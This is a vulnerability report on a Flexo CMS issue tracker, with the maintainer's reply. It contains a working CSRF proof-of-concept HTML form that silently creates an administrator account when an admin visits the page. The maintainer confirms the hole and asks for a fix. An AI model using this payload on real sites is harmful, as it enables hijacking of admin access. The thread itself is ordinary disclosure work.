There is a CSRF vulnerability that can add an administrator

[riyir]

• After administrator log in, there is a CSRF vulnerability that can add an administrator via /flexo1.source-master/admin/user
• poc
  -csrf.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.99/flexo1.source-master/admin/user/add" method="POST">
      <input type="hidden" name="user&#91;name&#93;" value="hacker1" />
      <input type="hidden" name="user&#91;email&#93;" value="hacker1&#64;hacker&#46;com" />
      <input type="hidden" name="user&#91;username&#93;" value="hacker1" />
      <input type="hidden" name="user&#91;password&#93;" value="hacker" />
      <input type="hidden" name="user&#91;confirm&#93;" value="hacker" />
      <input type="hidden" name="user&#95;permission&#91;administrator&#93;" value="1" />
      <input type="hidden" name="user&#91;language&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[jmas]

Hello, @riyir, Flexo CMS development currently is frozen. Thank you for letting us know about CSRF vulnerability. Flexo CMS do not support CSRF validation at the moment. And I do not have any estimation about when it will be added. If you have some time to write working solution for that (as part of core functionality or as plugin) - I will review and accept your PR to Flexo CMS repository. Thank you and good luck!